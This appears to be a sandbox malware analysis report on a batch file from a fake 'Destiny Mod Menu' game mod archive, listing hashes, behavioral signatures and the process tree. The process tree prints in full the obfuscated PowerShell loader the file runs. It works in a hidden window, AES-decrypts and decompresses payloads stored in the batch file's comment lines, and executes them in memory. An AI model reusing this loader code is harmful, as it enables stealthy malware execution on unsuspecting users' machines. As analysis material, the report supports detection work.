Overview
overview
10Static
static
1Destiny Mod Menu.rar
windows7-x64
1Destiny Mod Menu.rar
windows10-2004-x64
10Destiny Mo...er.bat
windows7-x64
8Destiny Mo...er.bat
windows10-2004-x64
10Destiny Mo...fe.txt
windows7-x64
1Destiny Mo...fe.txt
windows10-2004-x64
1Destiny Mo...ll.cmd
windows7-x64
1Destiny Mo...ll.cmd
windows10-2004-x64
1Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
04/03/2025, 19:23
Static task
static1
Behavioral task
behavioral1
Sample
Destiny Mod Menu.rar
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
Destiny Mod Menu.rar
Resource
win10v2004-20250217-en
Behavioral task
behavioral3
Sample
Destiny Mod Menu/Destiny/Destiny Loader Installer.bat
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Destiny Mod Menu/Destiny/Destiny Loader Installer.bat
Resource
win10v2004-20250217-en
Behavioral task
behavioral5
Sample
Destiny Mod Menu/Destiny/Proof its Safe.txt
Resource
win7-20241010-en
Behavioral task
behavioral6
Sample
Destiny Mod Menu/Destiny/Proof its Safe.txt
Resource
win10v2004-20250217-en
Behavioral task
behavioral7
Sample
Destiny Mod Menu/Destiny/Unistall.cmd
Resource
win7-20240729-en
Behavioral task
behavioral8
Sample
Destiny Mod Menu/Destiny/Unistall.cmd
Resource
win10v2004-20250217-en
General
-
Target
Destiny Mod Menu/Destiny/Destiny Loader Installer.bat
-
Size
265KB
-
MD5
512d6ccd633decbe126a38c51c29a280
-
SHA1
017e6fbb5eb2e367f37b4e5c33eb89cafcc7db48
-
SHA256
411b2ce5f266c6b25a645c37e7fd071772810ae5c74cf457db20f43f43277fe5
-
SHA512
fde1138b21117652348ec58f6ea92687fb94b111e0c49b5528d995a8e5e1588e7d1957761ca6eabb1010666f925b77a8032c129ec0839c5797a7e8381af24af7
-
SSDEEP
6144:jhbd8sLlMG4UZT009TJPirdyKRxv4oPhdP:ld9Jdr96YitZdP
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1620 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1620 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1620 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2404 wrote to memory of 1620 2404 cmd.exe 31 PID 2404 wrote to memory of 1620 2404 cmd.exe 31 PID 2404 wrote to memory of 1620 2404 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Destiny Mod Menu\Destiny\Destiny Loader Installer.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2404 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a4Wny3pMw/quq+3CugnkbgjOgDqz7GpqcCoFYQ082Qg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('McCcrn5ax83ehqoAfbIc3A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $RELLW=New-Object System.IO.MemoryStream(,$param_var); $KdJRg=New-Object System.IO.MemoryStream; $atmEh=New-Object System.IO.Compression.GZipStream($RELLW, [IO.Compression.CompressionMode]::Decompress); $atmEh.CopyTo($KdJRg); $atmEh.Dispose(); $RELLW.Dispose(); $KdJRg.Dispose(); $KdJRg.ToArray();}function execute_function($param_var,$param2_var){ $LMajr=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ZqHWQ=$LMajr.EntryPoint; $ZqHWQ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Destiny Mod Menu\Destiny\Destiny Loader Installer.bat';$VYMDR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Destiny Mod Menu\Destiny\Destiny Loader Installer.bat').Split([Environment]::NewLine);foreach ($kwRBK in $VYMDR) { if ($kwRBK.StartsWith(':: ')) { $buoVq=$kwRBK.Substring(3); break; }}$payloads_var=[string[]]$buoVq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1620
-